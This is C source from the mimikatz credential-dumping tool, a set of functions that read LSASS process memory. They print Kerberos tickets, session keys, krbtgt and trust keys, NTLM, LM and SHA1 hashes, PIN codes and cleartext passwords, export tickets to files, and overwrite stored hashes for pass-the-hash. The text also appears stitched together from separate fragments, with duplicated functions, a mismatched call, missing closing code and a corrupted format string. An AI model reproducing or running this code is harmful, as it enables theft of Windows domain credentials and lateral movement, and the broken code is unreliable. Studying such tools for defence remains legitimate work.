void kuhl_m_kerberos_ticket_display(PKIWI_KERBEROS_TICKET ticket, BOOL encodedTicketToo)
{
kprintf(L"\n\t Start/End/MaxRenew: ");
kull_m_string_displayLocalFileTime(&ticket->StartTime); kprintf(L" ; ");
kull_m_string_displayLocalFileTime(&ticket->EndTime); kprintf(L" ; ");
kull_m_string_displayLocalFileTime(&ticket->RenewUntil);
kuhl_m_kerberos_ticket_displayExternalName(L"\n\t Service Name ", ticket->ServiceName, &ticket->DomainName);
kuhl_m_kerberos_ticket_displayExternalName(L"\n\t Target Name ", ticket->TargetName, &ticket->TargetDomainName);
kuhl_m_kerberos_ticket_displayExternalName(L"\n\t Client Name ", ticket->ClientName, &ticket->AltTargetDomainName);
if(ticket->Description.Buffer)
kprintf(L" ( %wZ )", &ticket->Description);
kprintf(L"\n\t Flags %08x : ", ticket->TicketFlags);
kuhl_m_kerberos_ticket_displayFlags(ticket->TicketFlags);
kprintf(L"\n\t Session Key : 0x%08x - %s", ticket->KeyType, kuhl_m_kerberos_ticket_etype(ticket->KeyType));
if(ticket->Key.Value)
{
kprintf(L"\n\t ");
kull_m_string_wprintf_hex(ticket->Key.Value, ticket->Key.Length, 0);
}
kprintf(L"\n\t Ticket : 0x%08x - %s ; kvno = %u", ticket->TicketEncType, kuhl_m_kerberos_ticket_etype(ticket->TicketEncType), ticket->TicketKvno);
if(encodedTicketToo)
{
kprintf(L"\n\t ");
if(ticket->Ticket.Value)
kull_m_string_wprintf_hex(ticket->Ticket.Value, ticket->Ticket.Length, 1);
else PRINT_ERROR_AUTO(L"NULL Ticket Value !");
}
else kprintf(L"\t[...]");
}
void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN DWORD grp, IN PVOID tickets, IN BOOL isFile)
{
PVOID pStruct, pRef = tickets;
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS data = {&pStruct, &hBuffer}, aTicket = {NULL, &hBuffer}, aLsassBuffer = {tickets, pData->cLsass->hLsassMem};
DWORD nbTickets = 0;
PKIWI_KERBEROS_TICKET pKiwiTicket;
PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred;
BOOL isNormalSessionKey;
wchar_t * filename;
if(aTicket.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structTicketSize))
{
if(kull_m_memory_copy(&data, &aLsassBuffer, sizeof(PVOID)))
{
data.address = pStruct;
data.hMemory = pData->cLsass->hLsassMem;
while(data.address != pRef)
{
if(kull_m_memory_copy(&aTicket, &data, kerbHelper[KerbOffsetIndex].structTicketSize))
{
kprintf(L"\n\t [%08x]", nbTickets);
if(pKiwiTicket = kuhl_m_sekurlsa_kerberos_createTicket((LPBYTE) aTicket.address, pData->cLsass->hLsassMem))
{
isNormalSessionKey = (pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) || (pKiwiTicket->Key.Length < (ULONG) FIELD_OFFSET(LSAISO_DATA_BLOB, data));
kuhl_m_kerberos_ticket_display(pKiwiTicket, isNormalSessionKey, FALSE);
if(isFile)
if(filename = kuhl_m_sekurlsa_kerberos_generateFileName(pData->LogonId, grp, nbTickets, pKiwiTicket, MIMIKATZ_KERBEROS_EXT))
{
if(App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(pKiwiTicket, FALSE))
{
if(kull_m_file_writeData(filename, App_KrbCred, kull_m_asn1_getSize(App_KrbCred)))
kprintf(L"\n\t * Saved to file %s !", filename);
else PRINT_ERROR_AUTO(L"kull_m_file_writeData");
LocalFree(App_KrbCred);
}
LocalFree(filename);
}
if(!isNormalSessionKey)
{
kprintf(L"\n\t LSA Session Key : 0x%08x - %s", pKiwiTicket->KeyType, kuhl_m_kerberos_ticket_etype(pKiwiTicket->KeyType));
kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) pKiwiTicket->Key.Value);
}
kuhl_m_kerberos_ticket_freeTicket(pKiwiTicket);
}
data.address = ((PLIST_ENTRY) (aTicket.address))->Flink;
}
else break;
nbTickets++;
}
}
LocalFree(aTicket.address);
}
}
void kuhl_m_sekurlsa_trust_domainkeys(struct _KDC_DOMAIN_KEYS_INFO * keysInfo, PCWSTR prefix, BOOL incoming, PCUNICODE_STRING domain)
{
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLsass = {keysInfo->keys, cLsass.hLsassMem}, aData = {NULL, &hBuffer};
DWORD i;
PKDC_DOMAIN_KEYS domainKeys;
if((keysInfo->keysSize && keysInfo->keys) || (keysInfo->password.Length && keysInfo->password.Buffer))
{
kprintf(L"\n [%s] ", prefix);
kprintf(incoming ? L"-> %wZ\n" : L"%wZ ->\n", domain);
if(kull_m_string_getUnicodeString(&keysInfo->password, cLsass.hLsassMem))
{
kprintf(L"\tfrom: ");
if(kull_m_string_suspectUnicodeString(&keysInfo->password))
kprintf(L"%wZ", &keysInfo->password);
else kull_m_string_wprintf_hex(keysInfo->password.Buffer, keysInfo->password.Length, 1);
LocalFree(keysInfo->password.Buffer);
}
kprintf(L"\n");
if(keysInfo->keysSize && keysInfo->keys)
{
if(domainKeys = (PKDC_DOMAIN_KEYS) LocalAlloc(LPTR, keysInfo->keysSize))
{
aData.address = domainKeys;
if(kull_m_memory_copy(&aData, &aLsass, keysInfo->keysSize))
{
for(i = 0; i < domainKeys->nbKeys; i++)
{
kprintf(L"\t* %s : ", kuhl_m_kerberos_ticket_etype(domainKeys->keys[i].type));
kull_m_string_wprintf_hex((PBYTE) domainKeys + domainKeys->keys[i].offset, domainKeys->keys[i].size, 0);
kprintf(L"\n");
}
}
LocalFree(domainKeys);
}
}
}
}
void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN KULL_M_MEMORY_ADDRESS Localkerbsession, IN KULL_M_MEMORY_ADDRESS RemoteLocalKerbSession, IN OPTIONAL LPVOID pOptionalData)
{
PSEKURLSA_PTH_DATA pthData = (PSEKURLSA_PTH_DATA) pOptionalData;
DWORD i, nbHash;
BYTE ntlmHash[LM_NTLM_HASH_LENGTH], aes128key[AES_128_KEY_LENGTH], aes256key[AES_256_KEY_LENGTH];
BOOL isNtlm = FALSE, isAes128 = FALSE, isAes256 = FALSE;
UNICODE_STRING nullPasswd = {0, 0, NULL};
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = {NULL, Localkerbsession.hMemory}, aLocalHashMemory = {NULL, Localkerbsession.hMemory}, aLocalNTLMMemory = {NULL, Localkerbsession.hMemory}, aLocalPasswdMemory = {&nullPasswd, Localkerbsession.hMemory}, aRemotePasswdMemory = {(PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password), RemoteLocalKerbSession.hMemory};
PKERB_HASHPASSWORD_GENERIC pHash;
PBYTE baseCheck;
PCWCHAR resultok;
SIZE_T offset;
if(RemoteLocalKerbSession.address = *(PVOID *) ((PBYTE) Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
{
if(aLocalKeyMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structKeyListSize))
{
if(kull_m_memory_copy(&aLocalKeyMemory, &RemoteLocalKerbSession, kerbHelper[KerbOffsetIndex].structKeyListSize))
{
if(nbHash = ((DWORD *)(aLocalKeyMemory.address))[1])
{
if(isNtlm = (pthData->NtlmHash != NULL))
{
RtlCopyMemory(ntlmHash, pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
if(pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_BUILD_VISTA)
(*pData->lsassLocalHelper->pLsaProtectMemory)(ntlmHash, LM_NTLM_HASH_LENGTH);
}
if(pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_BUILD_7)
{
if(isAes128 = (pthData->Aes128Key != NULL))
{
RtlCopyMemory(aes128key, pthData->Aes128Key, AES_128_KEY_LENGTH);
(*pData->lsassLocalHelper->pLsaProtectMemory)(aes128key, AES_128_KEY_LENGTH);
}
if(isAes256 = (pthData->Aes256Key != NULL))
{
RtlCopyMemory(aes256key, pthData->Aes256Key, AES_256_KEY_LENGTH);
(*pData->lsassLocalHelper->pLsaProtectMemory)(aes256key, AES_256_KEY_LENGTH);
}
}
RemoteLocalKerbSession.address = baseCheck = (PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].structKeyListSize;
i = nbHash * (DWORD) kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize;
if(aLocalHashMemory.address = LocalAlloc(LPTR, i))
{
if(kull_m_memory_copy(&aLocalHashMemory, &RemoteLocalKerbSession, i))
{
kprintf(L"data copy @ %p", RemoteLocalKerbSession.address, nbHash);
for(i = 0, pthData->isReplaceOk = TRUE; (i < nbHash) && pthData->isReplaceOk; i++)
{
offset = i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric;
pHash = (PKERB_HASHPASSWORD_GENERIC) ((PBYTE) aLocalHashMemory.address + offset);
kprintf(L"\n \\_ %s ", kuhl_m_kerberos_ticket_etype(pHash->Type));
RemoteLocalKerbSession.address = pHash->Checksump;
resultok = L"OK";
if(isNtlm && ((pHash->Type != KERB_ETYPE_AES128_CTS_HMAC_SHA1_96) && (pHash->Type != KERB_ETYPE_AES256_CTS_HMAC_SHA1_96)) && (pHash->Size == LM_NTLM_HASH_LENGTH))
{
aLocalNTLMMemory.address = ntlmHash;
offset = LM_NTLM_HASH_LENGTH;
}
else if(isAes128 && (pHash->Type == KERB_ETYPE_AES128_CTS_HMAC_SHA1_96) && (pHash->Size == AES_128_KEY_LENGTH))
{
aLocalNTLMMemory.address = aes128key;
offset = AES_128_KEY_LENGTH;
}
else if(isAes256 && (pHash->Type == KERB_ETYPE_AES256_CTS_HMAC_SHA1_96) && (pHash->Size == AES_256_KEY_LENGTH))
{
aLocalNTLMMemory.address = aes256key;
offset = AES_256_KEY_LENGTH;
}
else
{
aLocalNTLMMemory.address = pHash;
RemoteLocalKerbSession.address = baseCheck + offset;
offset = FIELD_OFFSET(KERB_HASHPASSWORD_GENERIC, Checksump);
resultok = kuhl_m_kerberos_ticket_etype(KERB_ETYPE_NULL);
pHash->Type = KERB_ETYPE_NULL;
pHash->Size = 0;
kprintf(L"-> ");
}
if(pthData->isReplaceOk = kull_m_memory_copy(&RemoteLocalKerbSession, &aLocalNTLMMemory, offset))
kprintf(L"%s", resultok);
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
}
if(pthData->isReplaceOk && ((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetCreds))->Password.Buffer)
{
kprintf(L"\n \\_ *Password replace -> ");
if(pthData->isReplaceOk = kull_m_memory_copy(&aRemotePasswdMemory, &aLocalPasswdMemory, sizeof(UNICODE_STRING)))
kprintf(L"null", aRemotePasswdMemory.address);
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
}
}
LocalFree(aLocalHashMemory.address);
}
}
}
LocalFree(aLocalKeyMemory.address);
}
}
}
void kuhl_m_sekurlsa_krbtgt_keys(PVOID addr, PCWSTR prefix)
{
DWORD sizeForCreds, i;
KIWI_KRBTGT_CREDENTIALS_6 tmpCred6, *creds6;
KIWI_KRBTGT_CREDENTIALS_5 tmpCred5, *creds5;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLsass = {addr, cLsass.hLsassMem}, aLocal = {&tmpCred6, &hLocalMemory};
if(addr)
{
kprintf(L"\n%s krbtgt: ", prefix);
if(cLsass.osContext.MajorVersion < 6)
{
aLocal.address = &tmpCred5;
if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(KIWI_KRBTGT_CREDENTIALS_5) - sizeof(KIWI_KRBTGT_CREDENTIAL_5)))
{
sizeForCreds = sizeof(KIWI_KRBTGT_CREDENTIALS_5) + (tmpCred5.cbCred - 1) * sizeof(KIWI_KRBTGT_CREDENTIAL_5);
if(creds5 = (PKIWI_KRBTGT_CREDENTIALS_5) LocalAlloc(LPTR, sizeForCreds))
{
aLocal.address = creds5;
if(kull_m_memory_copy(&aLocal, &aLsass, sizeForCreds))
{
kprintf(L"%u credentials\n", creds5->cbCred);
for(i = 0; i < creds5->cbCred; i++)
{
kprintf(L"\t * %s : ", kuhl_m_kerberos_ticket_etype(PtrToLong(creds5->credentials[i].type)));
aLsass.address = creds5->credentials[i].key;
if(aLocal.address = LocalAlloc(LPTR, PtrToUlong(creds5->credentials[i].size)))
{
if(kull_m_memory_copy(&aLocal, &aLsass, PtrToUlong(creds5->credentials[i].size)))
kull_m_string_wprintf_hex(aLocal.address, PtrToUlong(creds5->credentials[i].size), 0);
LocalFree(aLocal.address);
}
kprintf(L"\n");
}
}
LocalFree(creds5);
}
}
}
else
{
aLocal.address = &tmpCred6;
if(kull_m_memory_copy(&aLocal, &aLsass, sizeof(KIWI_KRBTGT_CREDENTIALS_6) - sizeof(KIWI_KRBTGT_CREDENTIAL_6)))
{
sizeForCreds = sizeof(KIWI_KRBTGT_CREDENTIALS_6) + (tmpCred6.cbCred - 1) * sizeof(KIWI_KRBTGT_CREDENTIAL_6);
if(creds6 = (PKIWI_KRBTGT_CREDENTIALS_6) LocalAlloc(LPTR, sizeForCreds))
{
aLocal.address = creds6;
if(kull_m_memory_copy(&aLocal, &aLsass, sizeForCreds))
{
kprintf(L"%u credentials\n", creds6->cbCred);
for(i = 0; i < creds6->cbCred; i++)
{
kprintf(L"\t * %s : ", kuhl_m_kerberos_ticket_etype(PtrToLong(creds6->credentials[i].type)));
aLsass.address = creds6->credentials[i].key;
if(aLocal.address = LocalAlloc(LPTR, PtrToUlong(creds6->credentials[i].size)))
{
if(kull_m_memory_copy(&aLocal, &aLsass, PtrToUlong(creds6->credentials[i].size)))
kull_m_string_wprintf_hex(aLocal.address, PtrToUlong(creds6->credentials[i].size), 0);
LocalFree(aLocal.address);
}
kprintf(L"\n");
}
}
LocalFree(creds6);
}
}
}
}
}
NTSTATUS kuhl_m_kerberos_list(int argc, wchar_t * argv[])
{
NTSTATUS status, packageStatus;
KERB_QUERY_TKT_CACHE_REQUEST kerbCacheRequest = {KerbQueryTicketCacheExMessage, {0, 0}};
PKERB_QUERY_TKT_CACHE_EX_RESPONSE pKerbCacheResponse;
PKERB_RETRIEVE_TKT_REQUEST pKerbRetrieveRequest;
PKERB_RETRIEVE_TKT_RESPONSE pKerbRetrieveResponse;
DWORD szData, i;
wchar_t * filename;
BOOL export = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL);
status = LsaCallKerberosPackage(&kerbCacheRequest, sizeof(KERB_QUERY_TKT_CACHE_REQUEST), (PVOID *) &pKerbCacheResponse, &szData, &packageStatus);
if(NT_SUCCESS(status))
{
if(NT_SUCCESS(packageStatus))
{
for(i = 0; i < pKerbCacheResponse->CountOfTickets; i++)
{
kprintf(L"\n[%08x] - 0x%08x - %s", i, pKerbCacheResponse->Tickets[i].EncryptionType, kuhl_m_kerberos_ticket_etype(pKerbCacheResponse->Tickets[i].EncryptionType));
kprintf(L"\n Start/End/MaxRenew: ");
kull_m_string_displayLocalFileTime((PFILETIME) &pKerbCacheResponse->Tickets[i].StartTime); kprintf(L" ; ");
kull_m_string_displayLocalFileTime((PFILETIME) &pKerbCacheResponse->Tickets[i].EndTime); kprintf(L" ; ");
kull_m_string_displayLocalFileTime((PFILETIME) &pKerbCacheResponse->Tickets[i].RenewTime);
kprintf(L"\n Server Name : %wZ @ %wZ", &pKerbCacheResponse->Tickets[i].ServerName, &pKerbCacheResponse->Tickets[i].ServerRealm);
kprintf(L"\n Client Name : %wZ @ %wZ", &pKerbCacheResponse->Tickets[i].ClientName, &pKerbCacheResponse->Tickets[i].ClientRealm);
kprintf(L"\n Flags %08x : ", pKerbCacheResponse->Tickets[i].TicketFlags);
kuhl_m_kerberos_ticket_displayFlags(pKerbCacheResponse->Tickets[i].TicketFlags);
if(export)
{
szData = sizeof(KERB_RETRIEVE_TKT_REQUEST) + pKerbCacheResponse->Tickets[i].ServerName.MaximumLength;
if(pKerbRetrieveRequest = (PKERB_RETRIEVE_TKT_REQUEST) LocalAlloc(LPTR, szData)) // LPTR implicates KERB_ETYPE_NULL
{
pKerbRetrieveRequest->MessageType = KerbRetrieveEncodedTicketMessage;
pKerbRetrieveRequest->CacheOptions = /*KERB_RETRIEVE_TICKET_USE_CACHE_ONLY | */KERB_RETRIEVE_TICKET_AS_KERB_CRED;
pKerbRetrieveRequest->TicketFlags = pKerbCacheResponse->Tickets[i].TicketFlags;
pKerbRetrieveRequest->TargetName = pKerbCacheResponse->Tickets[i].ServerName;
pKerbRetrieveRequest->TargetName.Buffer = (PWSTR) ((PBYTE) pKerbRetrieveRequest + sizeof(KERB_RETRIEVE_TKT_REQUEST));
RtlCopyMemory(pKerbRetrieveRequest->TargetName.Buffer, pKerbCacheResponse->Tickets[i].ServerName.Buffer, pKerbRetrieveRequest->TargetName.MaximumLength);
status = LsaCallKerberosPackage(pKerbRetrieveRequest, szData, (PVOID *) &pKerbRetrieveResponse, &szData, &packageStatus);
if(NT_SUCCESS(status))
{
if(NT_SUCCESS(packageStatus))
{
if(filename = kuhl_m_kerberos_generateFileName(i, &pKerbCacheResponse->Tickets[i], MIMIKATZ_KERBEROS_EXT))
{
if(kull_m_file_writeData(filename, pKerbRetrieveResponse->Ticket.EncodedTicket, pKerbRetrieveResponse->Ticket.EncodedTicketSize))
kprintf(L"\n * Saved to file : %s", filename);
LocalFree(filename);
}
LsaFreeReturnBuffer(pKerbRetrieveResponse);
}
else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbRetrieveEncodedTicketMessage / Package : %08x\n", packageStatus);
}
else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbRetrieveEncodedTicketMessage : %08x\n", status);
LocalFree(pKerbRetrieveRequest);
}
}
kprintf(L"\n");
}
LsaFreeReturnBuffer(pKerbCacheResponse);
}
else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbQueryTicketCacheEx2Message / Package : %08x\n", packageStatus);
}
VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags)
{
PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL;
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds;
PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds;
PKERB_HASHPASSWORD_6 pHashPassword;
UNICODE_STRING buffer;
PVOID base;
DWORD type, i;
if(mesCreds)
{
if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL)
{
type = flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK;
credentials = (PUNICODE_STRING) mesCreds;
if(credentials->Buffer)
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(((PUNICODE_STRING) mesCreds)->Buffer, ((PUNICODE_STRING) mesCreds)->Length);
switch(type)
{
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY:
pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) credentials->Buffer;
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->UserName, FALSE);
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->LogonDomainName, FALSE);
dprintf("\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds->UserName, &pPrimaryCreds->LogonDomainName);
if(pPrimaryCreds->isLmOwfPassword)
{
dprintf("\n\t * LM : ");
kull_m_string_dprintf_hex(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
}
if(pPrimaryCreds->isNtOwfPassword)
{
dprintf("\n\t * NTLM : ");
kull_m_string_dprintf_hex(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
}
if(pPrimaryCreds->isShaOwPassword)
{
dprintf("\n\t * SHA1 : ");
kull_m_string_dprintf_hex(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
}
break;
case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
base = (PBYTE) pRpceCredentialKeyCreds + sizeof(RPCE_CREDENTIAL_KEYCREDENTIAL) + (pRpceCredentialKeyCreds->unk0 - 1) * sizeof(MARSHALL_KEY);
for (i = 0; i < pRpceCredentialKeyCreds->unk0; i++)
kuhl_m_sekurlsa_genericKeyOutput(&pRpceCredentialKeyCreds->key[i], &base);
break;
default:
dprintf("\n\t * Raw data : ");
kull_m_string_dprintf_hex(credentials->Buffer, credentials->Length, 1);
}
}
}
else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_PINCODE)
{
if(mesCreds->UserName.Buffer)
{
if(kull_m_string_getDbgUnicodeString(&mesCreds->UserName))
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(mesCreds->UserName.Buffer, mesCreds->UserName.MaximumLength);
dprintf("\n\t * PIN code : %wZ", &mesCreds->UserName);
LocalFree(mesCreds->UserName.Buffer);
}
}
}
else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST)
{
pHashPassword = (PKERB_HASHPASSWORD_6) mesCreds;
dprintf("\n\t\t%s : ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type));
if(buffer.Length = buffer.MaximumLength = (USHORT) pHashPassword->Size)
{
buffer.Buffer = (PWSTR) pHashPassword->Checksump;
if(kull_m_string_getDbgUnicodeString(&buffer))
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(buffer.Buffer, buffer.MaximumLength);
kull_m_string_dprintf_hex(buffer.Buffer, buffer.Length, 0);
LocalFree(buffer.Buffer);
}
}
else dprintf("<no size, buffer is incorrect>");
}
else
{
if(mesCreds->UserName.Buffer || mesCreds->Domaine.Buffer || mesCreds->Password.Buffer)
{
if(kull_m_string_getDbgUnicodeString(&mesCreds->UserName) && kull_m_string_suspectUnicodeString(&mesCreds->UserName))
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN))
username = &mesCreds->UserName;
else
domain = &mesCreds->UserName;
}
if(kull_m_string_getDbgUnicodeString(&mesCreds->Domaine) && kull_m_string_suspectUnicodeString(&mesCreds->Domaine))
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_DOMAIN))
domain = &mesCreds->Domaine;
else
username = &mesCreds->Domaine;
}
if(kull_m_string_getDbgUnicodeString(&mesCreds->Password) /*&& !kull_m_string_suspectUnicodeString(&mesCreds->Password)*/)
{
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(mesCreds->Password.Buffer, mesCreds->Password.MaximumLength);
password = &mesCreds->Password;
}
if(password || !(flags & KUHL_SEKURLSA_CREDS_DISPLAY_WPASSONLY))
{
dprintf((flags & KUHL_SEKURLSA_CREDS_DISPLAY_LINE) ?
"%wZ\t%wZ\t"
:
"\n\t * Username : %wZ"
"\n\t * Domain : %wZ"
"\n\t * Password : "******"%.*S", password->Length / sizeof(wchar_t), password->Buffer);
else
dprintf("%wZ", password ? password : &uNull);
}
else kull_m_string_dprintf_hex(password->Buffer, password->Length, 1);
}
LocalFree(mesCreds->UserName.Buffer);
LocalFree(mesCreds->Domaine.Buffer);
LocalFree(mesCreds->Password.Buffer);
}
}
if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NEWLINE)
dprintf("\n");
}
else dprintf("LUID KO\n");
}
NTSTATUS kuhl_m_kerberos_list_tickets(PKERB_CALLBACK_CTX callbackCtx, BOOL bExport)
{
NTSTATUS status, packageStatus;
KERB_QUERY_TKT_CACHE_REQUEST kerbCacheRequest = {KerbQueryTicketCacheExMessage, {0, 0}};
PKERB_QUERY_TKT_CACHE_EX_RESPONSE pKerbCacheResponse;
PKERB_RETRIEVE_TKT_REQUEST pKerbRetrieveRequest = NULL;
PKERB_RETRIEVE_TKT_RESPONSE pKerbRetrieveResponse = NULL;
DWORD szData, i;
status = LsaCallKerberosPackage(&kerbCacheRequest, sizeof(KERB_QUERY_TKT_CACHE_REQUEST), (PVOID *) &pKerbCacheResponse, &szData, &packageStatus);
if(NT_SUCCESS(status))
{
if(NT_SUCCESS(packageStatus))
{
for(i = 0; i < pKerbCacheResponse->CountOfTickets; i++)
{
kprintf(L"\n[%08x] - 0x%08x - %s", i, pKerbCacheResponse->Tickets[i].EncryptionType, kuhl_m_kerberos_ticket_etype(pKerbCacheResponse->Tickets[i].EncryptionType));
kprintf(L"\n Start/End/MaxRenew: ");
kull_m_string_displayLocalFileTime((PFILETIME) &pKerbCacheResponse->Tickets[i].StartTime); kprintf(L" ; ");
kull_m_string_displayLocalFileTime((PFILETIME) &pKerbCacheResponse->Tickets[i].EndTime); kprintf(L" ; ");
kull_m_string_displayLocalFileTime((PFILETIME) &pKerbCacheResponse->Tickets[i].RenewTime);
kprintf(L"\n Server Name : %wZ @ %wZ", &pKerbCacheResponse->Tickets[i].ServerName, &pKerbCacheResponse->Tickets[i].ServerRealm);
kprintf(L"\n Client Name : %wZ @ %wZ", &pKerbCacheResponse->Tickets[i].ClientName, &pKerbCacheResponse->Tickets[i].ClientRealm);
kprintf(L"\n Flags %08x : ", pKerbCacheResponse->Tickets[i].TicketFlags);
kuhl_m_kerberos_ticket_displayFlags(pKerbCacheResponse->Tickets[i].TicketFlags);
if (bExport)
{
szData = sizeof(KERB_RETRIEVE_TKT_REQUEST)+pKerbCacheResponse->Tickets[i].ServerName.MaximumLength;
if (pKerbRetrieveRequest = (PKERB_RETRIEVE_TKT_REQUEST)LocalAlloc(LPTR, szData)) // LPTR implicates KERB_ETYPE_NULL
{
pKerbRetrieveRequest->MessageType = KerbRetrieveEncodedTicketMessage;
pKerbRetrieveRequest->CacheOptions = /*KERB_RETRIEVE_TICKET_USE_CACHE_ONLY | */KERB_RETRIEVE_TICKET_AS_KERB_CRED;
pKerbRetrieveRequest->TicketFlags = pKerbCacheResponse->Tickets[i].TicketFlags;
pKerbRetrieveRequest->TargetName = pKerbCacheResponse->Tickets[i].ServerName;
pKerbRetrieveRequest->TargetName.Buffer = (PWSTR)((PBYTE)pKerbRetrieveRequest + sizeof(KERB_RETRIEVE_TKT_REQUEST));
RtlCopyMemory(pKerbRetrieveRequest->TargetName.Buffer, pKerbCacheResponse->Tickets[i].ServerName.Buffer, pKerbRetrieveRequest->TargetName.MaximumLength);
status = LsaCallKerberosPackage(pKerbRetrieveRequest, szData, (PVOID *)&pKerbRetrieveResponse, &szData, &packageStatus);
}
}
if (callbackCtx && callbackCtx->pTicketHandler)
callbackCtx->pTicketHandler(callbackCtx->lpContext, &pKerbCacheResponse->Tickets[i], pKerbRetrieveResponse ? &pKerbRetrieveResponse->Ticket : NULL);
if (pKerbRetrieveRequest)
{
LocalFree(pKerbRetrieveRequest);
pKerbRetrieveRequest = NULL;
}
if (pKerbRetrieveResponse)
{
LsaFreeReturnBuffer(pKerbRetrieveResponse);
pKerbRetrieveResponse = NULL;
}
kprintf(L"\n");
}
LsaFreeReturnBuffer(pKerbCacheResponse);
}
else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbQueryTicketCacheEx2Message / Package : %08x\n", packageStatus);
}
else PRINT_ERROR(L"LsaCallAuthenticationPackage KerbQueryTicketCacheEx2Message : %08x\n", status);
return STATUS_SUCCESS;
}
